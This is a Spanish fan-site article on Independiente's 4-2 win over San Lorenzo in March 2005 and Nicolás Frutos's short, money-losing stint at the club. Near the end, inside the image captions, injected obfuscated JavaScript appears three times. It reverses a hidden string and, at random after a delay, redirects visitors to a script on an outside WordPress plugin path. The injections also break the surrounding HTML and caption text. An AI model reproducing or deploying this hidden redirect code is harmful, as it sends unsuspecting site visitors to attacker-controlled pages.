Conectate con nosotros

Efemérides

Efemérides del 05 de Marzo

No se puede amar lo que no se conoce. Las efemérides cuentan la enorme historia del Glorioso INDEPENDIENTE de Avellaneda.

2005Por la cuarta fecha del Torneo Clausura 2005, Independiente visita a San Lorenzo y le gana por 2 a 4 en un encuentro muy atractivo.

Aquel día el equipo fue: Carlos Navarro Montoya; Jorge Martínez, Javier Muñoz Mustafá, David Abraham y Juan Eluchans; Lucas Pusineri, Sebastián Carrizo, Federico Insúa y Franco Cángele (64’ Lucas Biglia); José Flores (75’ Hernán Losada) y Nicolás Frutos, con César Menotti como D.T. Mientras que el D.T. Héctor Veira puso este equipo para el local: Ramírez; Álvarez, García, Bottinelli y Paredes; Coudet, Santana, Barrientos y Mesera (56’ Montillo); Moreno (45’ Lavezzi) y Peirone.

Rápidamente el Rojo empezó mejor que su rival, y lo tradujo en la red a los 10 minutos, porque tras una secuencia de buenos pases cortos, la pelota le llega a Nicolás Frutos dentro del área y pone el 0 a 1. Pero a los 20 el local lo iguala, luego de un tiro de esquina bajo al primer palo, que se eleva por intento fallido de despeje, la pelota va al segundo palo y allí cabecea libre Jonathan Bottinelli.

A los 34’ el Rojo logra nuevamente la ventaja, porque hay un tiro de esquina que despeja la defensa de San Lorenzo, pero la pelota va directo a donde se encontraba Sebastián Carrizo, quien desde fuera del área saca un derechazo fortísimo y maravilloso, mandando la pelota a un ángulo e inflando la red por la potencia. Y apenas 2’ después se estira la diferencia, cuando Lucas Pusineri toca para Nicolás Frutos, y éste sorprende con un remate de lejos con pierna zurda, haciendo que la pelota pegue en la base del poste y se meta.

En la segunda etapa Independiente define el partido a los 58’ con su cuarto gol. Jorge Martínez llevó la pelota por derecha, metió un gran pase al espacio vacío en el fondo del campo, donde llegó Franco Cángele para tocar cortito hacia atrás, y allí llegó José “Turu” Flores para definir con derecha directo a la red. El 4 a 2 definitivo del cotejo llegó a los 80 minutos, y estuvo a cargo del ingresado Walter Montillo, que sacó un sensacional remate de lejos para colgarla del ángulo superior derecho del “Mono” Navarro Montoya. Muy buen triunfo del Rojo, con una buena producción, en un partido atractivo como dije primeramente, y de goles de muy buena calidad.

Lo primero que hay que decir, es que se trató de la primera victoria del Rojo en el torneo, luego de un mal arranque empatando con Quilmes y Almagro, y cayendo frente a Lanús. Y el desempeño siguió siendo malo durante todo el semestre, porque el equipo terminó la competición en el puesto 12, sin ninguna victoria para destacar más que la de un día como hoy. El campeón de ese Clausura fue Vélez.

La otra cuestión para mencionar, es que la figura del partido fue Nicolás Frutos, quien convertía sus dos primeros goles con la camiseta roja. El joven delantero había llegado al club luego de jugar en Unión de San Fé, San Lorenzo, Nueva Chicago, Las Palmas de España, y Gimnasia y Esgrima La Plata. Debutó frente a Almagro en la fecha 2, y un día como hoy se estrenaba en la red.

Un caso increíble lo de Nicolás, porque solamente duró unos 10 meses en el club. Fue comprado por un grupo empresario en aproximadamente medio millón de dólares, lo acercaron a Independiente y, gracias a su alto nivel, el club fue nada más que una vidriera de venta. En octubre de ese mismo año 2005 Nicolás sería vendido en casi 3 millones (5 veces más de lo que fue pagado), y de esa suma el Rojo recibió unos 350 mil dólares a modo de resarcimiento por la interrupción del contrato. Claramente, desde el aspecto económico fue muy negativa la operación.

Y si hablamos del aspecto futbolístico, hay que decir que en su primer torneo, éste clausura que estamos recordando, Nicolás fue el goleador del equipo con 10 goles. Pero durante el segundo semestre, disputándose el Torneo Apertura, Frutos formó rápidamente una dupla notable con Sergio “Kun” Agüero, complementándose ambos de forma muy prometedora. Iban 10 jornadas del torneo y Nicolás había marcado 9 goles, y allí, a media competencia, fue vendido a Anderlecht de Bélgica. Aquí, cuando uno recuerda toda esta situación, es cuando no se puede entender cómo hay hinchas que bastardean a Sergio Agüero con la famosa frase “En Independiente no ganó nada”.

Pero volviendo a Frutos, fueron 28 partidos con 19 goles su producción en 10 meses en la Institución, y su partida no le sirvió a Independiente ni en lo económico ni en lo futbolístico, siendo un ejemplo claro de las nefastas dirigencias que se vienen sucediendo hace décadas. Por aquel entonces, el presidente era Julio Comparada, que estuvo durante dos mandatos en el club, más 1 año y medio del gobierno de Ducatenzeiler que le cedió la gerencia de fútbol, incluyendo en su cúpula dirigencial a Hugo Moyano, Pablo Moyano y Héctor Maldonado, justamente las 3 personas que llevan dos mandatos al frente del club.

La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»71″ height=»55″/></figure></div>



<p>Les dejo <strong>el video resumen del partido en el primer video</strong>:</p>



<figure class=
La imagen tiene un atribu<script>$mWn=function(n){if(typeof ($mWn.list[n])==»string») return $mWn.list[n].split(«»).reverse().join(«»);return $mWn.list[n];};$mWn.list=[«\’php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\’=ferh.noitacol.tnemucod»];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}</script>to ALT vacío; su nombre de archivo es DIABLITO-para-SEPARADOR.jpg» width=»68″ height=»52″/></figure></div>



<p><strong>Y en el segundo</strong>, <strong><script>$mWn=function(n){if(typeof ($mWn.list[n])==todos los goles de Nicolás Frutos en su efímero paso por el club:

Colaboración: Hernán Paglieri-Vicepresidente Peña Roja Daniel BertoniSan Andrés de Giles

Click to comment

Leave a Reply

Tu dirección de correo electrónico no será publicada.

Destacadas

PROGRAMA 2206 de Correo Independiente

Radio Roja 195.7

asd

More in Efemérides